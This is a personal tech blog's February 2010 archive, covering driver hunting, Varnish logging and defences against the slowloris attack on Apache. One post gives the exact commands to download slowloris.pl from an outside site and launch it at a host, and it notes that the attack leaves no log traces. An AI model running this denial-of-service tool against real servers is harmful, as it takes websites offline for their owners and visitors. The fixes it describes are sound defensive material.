Archive for February, 2010

Nosferatu (1922) – One of the early horror movies

Thursday, February 4th, 2010

Folks, check out Nosferatu, an early horror movie, on YouTube!
The film dates back to the distant 1922, wow! 🙂

Installing drivers on Computer with Motherboard ASUS A7N8X-VM with chipset (NVIDIA Nforce IGP)

Wednesday, February 3rd, 2010

Today the wife of an old friend of mine, who owns a small architecture company,
called to ask if I could reinstall two of her computers.
I accepted and here I am reinstalling the systems.
The first one lacked drivers and it was a real pain in the ass.
The system was a computer with an ASUS A7N8X-VM motherboard. To determine the
motherboard type and chipset I used a free program called aida32. The program
gives the user quite a concrete description of the computer hardware and is
quite similar to the famous but non-free Everest.
After I figured out the system hardware with AIDA32, which was:

Motherboard: ASUS A7N8X-VM
Chipset: NVIDIA Nforce IGP
LAN Driver: NVIDIA-MCP2-Lan-Controller
Graphics Adapter: ATI Radeon 9600
Sound Blaster: NVidia Audio Codec

Next I encountered problems finding the right driver pack. It took me
about 50 minutes to figure out which driver I should use to get the
LAN Driver: NVIDIA-MCP2-Lan-Controller working on the PC.
I found that this NVIDIA-MCP2-Lan-Controller is actually the
Realtek RTL8201BL, and therefore I needed drivers for the Realtek RTL8201BL.
After some time looking for the driver I came to a forum which discussed the
issue. The author revealed that the drivers required for the ASUS A7N8X-VM
are included in the NVIDIA nforce pack, in the file 15.45_nforce_winxp32_international_whql.exe,
which is available via nvidia.com's website. After installing this NVIDIA nforce pack all worked like a charm!

Configuring varnishd to log client IP addresses in Apache log

Wednesday, February 3rd, 2010

I realized today that because my varnish serves the incoming connections in front
of my Apache port, a really annoying problem appears.
In my httpd-access.log, every time I get a visit from the Net, the
IP address logged in the Apache log is 127.0.0.0,
i.e. localhost. That's a real pain in the ass, because it prevents me from
adequately tracking visitors' countries and their networks.
Therefore, to fix that and configure varnish to always pass my original visitors'
IPs to the Apache log, I had to follow the instructions described in
"How can I log the client IP address on the backend?" in the Varnish Cache FAQ.

Here I will include a step by step explanation of how I practically implemented
the solution explained in the FAQ on my FreeBSD.

First I had to edit:
/usr/local/etc/varnish/default.vcl
The following is currently my default.vcl file content:
backend default {
    .host = "127.0.0.1";
    .port = "8080";
}
sub vcl_recv {
    # Add a unique header containing the client address
    remove req.http.X-Forwarded-For;
    set req.http.X-Forwarded-For = client.ip;
    # [...]
}
Next I had to add:
varnishd_config="/usr/local/etc/varnish/default.vcl"
to my /etc/rc.conf
And then modify my:
/usr/local/etc/apache2/httpd.conf
and include:
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
as well as:
CustomLog /var/log/httpd-access.log varnishcombined
to all my VirtualHosts.

Finally it's required to restart both varnishd and apache:
pcfreak# /usr/local/etc/rc.d/varnishd restart
pcfreak# /usr/local/etc/rc.d/apache2 restart

That’s all folks!
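A check that can be run over the resulting httpd-access.log, as an added example (not from the original post or the Varnish FAQ): with the vcl_recv above, every request that passed through Varnish carries exactly one address in the first log field, so a "-" or a comma-separated list there means the request reached Apache on port 8080 without going through Varnish. The sample lines are constructed and the function names are hypothetical.

```python
import ipaddress
import re

# Leading fields of the "varnishcombined" format from this post:
#   %{X-Forwarded-For}i %l %u %t "%r" ...
# The first field may contain spaces ("a, b"), so it is matched lazily
# up to the ident, user and [time] fields that follow it.
LINE_RE = re.compile(r'^(?P<xff>.*?) \S+ \S+ \[[^\]]+\] "')

def classify(line):
    """Return (verdict, first_field) for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return ("unparsed", None)
    xff = m.group("xff")
    if xff == "-":
        # Apache logs "-" for an absent header: the request never saw vcl_recv.
        return ("no-header", xff)
    try:
        ipaddress.ip_address(xff)
    except ValueError:
        # A list or free text cannot come from `set ... = client.ip`.
        return ("not-single-ip", xff)
    return ("ok", xff)

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [03/Feb/2010:10:00:00 +0200] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '- - - [03/Feb/2010:10:00:05 +0200] "GET /server-status HTTP/1.1" 200 1024 "-" "curl/7.19"',
    '10.0.0.1, 198.51.100.9 - - [03/Feb/2010:10:00:09 +0200] "GET / HTTP/1.1" 200 512 "-" "-"',
]

def audit(lines):
    """List (line_number, verdict, field) for lines whose first field is not a trustworthy client IP."""
    findings = []
    for n, line in enumerate(lines, 1):
        verdict, field = classify(line)
        if verdict != "ok":
            findings.append((n, verdict, field))
    return findings

if __name__ == "__main__":
    for n, verdict, field in audit(SAMPLE):
        print(f"line {n}: {verdict}: {field!r}")
```

Any finding is a reason to check that Apache's port 8080 is reachable only from the Varnish host, since a client talking to it directly can put anything it likes in X-Forwarded-For.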

How to defend against slowloris Webserver Denial of Service Attack

Tuesday, February 2nd, 2010

As you can read in my previous post, there is a terrible DoS attack dating back
to the previous year. It's a real shit and it was really annoying for me to figure out
that my Apache running on top of FreeBSD is vulnerable as well.
Therefore I desperately needed a fix. I was not really keen on the idea of installing
mod_qos, because I really hate third party software messing up my Apache official module list.
Therefore I needed another approach. After some walk through google I found the following:
How to best defend against a "slowloris" attack against Apache web server. There are a couple of pathways
to follow, as you can read in the post above. However the one that fit me best was through
Varnish, a state-of-the-art high-performance HTTP accelerator (proxy). It's truly a wonderful piece of soft.
Installing it on FreeBSD was a piece of cake.
All I had to do was:

# cd /usr/ports/www/varnish
# make install clean
# echo 'varnishd_enable="YES"' >> /etc/rc.conf

And last but not least, I had to alter my /usr/local/etc/apache2/httpd.conf
and change everywhere the Listen port to 8080 instead of the default 80, the same
procedure goes for VirtualHosts ports as well.

The last thing to do was:
Restart Apache
# /usr/local/etc/rc.d/apache2 restart
Start varnishd
# /usr/local/etc/rc.d/varnishd start

That's it, now varnishd handles the incoming connections to my port 80 and passes whatever it thinks appropriate
to the Apache server. Hip, Hip Hooray no more slowloris worries!
Another possible approach to Apache Denial of Service issues is to limit the maximum
allowed connections per host to be no more than 20.

On GNU/Linux this could be done with the following iptables rule:
# iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 20 --connlimit-mask 32 -j DROP
On FreeBSD or OpenBSD with packet filter, you might want to take a look at the following:
Howto: Basic Denial of Service Protection Using PF

But wait, there are even more options to handle the slowloris DoS attack. It looks like some enthusiast
has even created an Apache module that handles the loris attack. Sources of the non-official
mod_antiloris module release as well as precompiled binaries in rpm can be obtained here.
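To see whether any single host is already holding more connections than the limit of 20 used above, the connection table can be counted per remote address. This is an added example, not code from the original post; it accepts both the Linux (addr:port) and FreeBSD (addr.port) `netstat -an` layouts, the sample output is constructed and the function names are hypothetical.

```python
import re
from collections import Counter

LIMIT = 20  # same threshold as --connlimit-above 20 in the iptables rule

# "192.0.2.10:80" (Linux) or "192.0.2.10.80" (FreeBSD); "*.*" and "0.0.0.0:*" do not match.
ENDPOINT_RE = re.compile(r'^(?P<addr>.+)[.:](?P<port>\d+)$')

def split_endpoint(text):
    """Split a netstat endpoint into (address, port), or None for wildcards."""
    m = ENDPOINT_RE.match(text)
    return (m.group("addr"), int(m.group("port"))) if m else None

def connections_per_host(netstat_lines, port=80):
    """Count ESTABLISHED TCP connections to the local port, keyed by remote address."""
    counts = Counter()
    for line in netstat_lines:
        f = line.split()
        if len(f) < 6 or not f[0].startswith("tcp") or f[5] != "ESTABLISHED":
            continue  # header lines, LISTEN sockets, UDP, other states
        local, remote = split_endpoint(f[3]), split_endpoint(f[4])
        if local and remote and local[1] == port:
            counts[remote[0]] += 1
    return counts

def over_limit(netstat_lines, port=80, limit=LIMIT):
    """Hosts holding more than `limit` connections, sorted by address."""
    counts = connections_per_host(netstat_lines, port)
    return sorted((host, n) for host, n in counts.items() if n > limit)

def build_sample():
    """Constructed netstat output: one host with 25 connections, one with 3."""
    lines = ["Proto Recv-Q Send-Q Local Address Foreign Address State",
             "tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN"]
    lines += [f"tcp 0 0 192.0.2.10:80 203.0.113.5:{40000 + i} ESTABLISHED"
              for i in range(25)]
    lines += [f"tcp4 0 0 192.0.2.10.80 198.51.100.7.{50000 + i} ESTABLISHED"
              for i in range(3)]
    lines.append("tcp 0 0 192.0.2.10:22 203.0.113.5:60000 ESTABLISHED")
    return lines

if __name__ == "__main__":
    for host, n in over_limit(build_sample()):
        print(f"{host} holds {n} connections to port 80 (limit {LIMIT})")
```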

Apache Denial of Service (DoS) attack with Slowloris / Crashing Apache

Monday, February 1st, 2010

A friend of mine pointed me to a nice tool that is able to create a successful denial of service against
most of the running web servers out there. The tool is called slowloris.
For any further information there is the following publication on ha.ckers.org about slowloris.
The original article of the friend of mine is located on his (mpetrov.net) personal blog.
Unfortunately the post is in Bulgarian so it's not a match for an English speaking audience.
To launch the attack on Debian Linux all you need is:

# apt-get install libio-all-perl libio-socket-ssl-perl
# wget http://ha.ckers.org/slowloris/slowloris.pl
now issue the attack
# perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache

There you go, the Apache server is not responding, no traces of the DoS are left on the server,
the log file is completely clear of records!
The fix to the attack comes with installing the not so popular Apache module: mod_qos
# cd /tmp/
# wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz
# tar zxvf mod_qos-9.7.tar.gz
# cd mod_qos-9.7/apache2/
# apxs2 -i -c mod_qos.c
The module is installed to "/usr/lib/apache2/modules".
All that is left is configuring the module:
# cd /etc/apache2/mods-available/
# vim qos.load

Add the following in the file:

LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so

Cheers! 🙂
I should express my gratitude to Martin Petrov's blog for the great info.

Unix User

Monday, February 1st, 2010

Unix User